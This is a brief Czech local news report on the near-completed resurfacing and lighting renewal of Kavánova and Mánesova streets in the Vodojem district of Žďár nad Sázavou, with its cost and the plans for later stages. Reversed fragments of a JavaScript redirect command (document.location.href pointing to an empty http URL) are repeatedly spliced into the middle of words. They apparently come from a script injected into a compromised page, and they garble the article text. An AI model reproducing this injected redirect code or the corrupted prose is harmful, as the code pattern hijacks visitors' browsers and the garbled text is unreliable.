Rainbow page separator

Oprava prvních dvou ulic ve čtvrti Vodojem se blíží ke konci

Neděle, 12. listopadu 2017

Veřejné osvětlení

Žďár nad Sázavou / Po dvacátém lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu má být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová rekonstrukce povrchů ulic Kavánova a Mánesova v lokalitě Vodojem, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně rozšíření části veřejného osvětlení směrem k by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovým domům v ulici Novoměstská.
Stavba byla zahájena 21. srpna a sdružení firem Kavánova Mánesova GC, které zastřešuje společnosti Gremis a Colas, již ji provádí, má na realizaci dvaadevadesát dnů. V ulicích probíhá rekonstrukce místních komunikací, chodníků i veřejného osvětlení, přibude rovněž nový mobiliář a veřejná zeleň. Celkové náklady na revitalizaci ulic jsou vyčísleny na 11,2 milionu korun.
Navazující etapy rekonstrukce mají ve čtvrti Vodojem pokračovat v dalších letech, na řadu tak v průběhu přibližně pěti let přijdou postupně i ostatní ulice. V příštím roce půjde o opravu ulice Alšova. Podle odhadu vedení žďárské radnice by stavební práce měly být kompletně ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovy v roce 2022.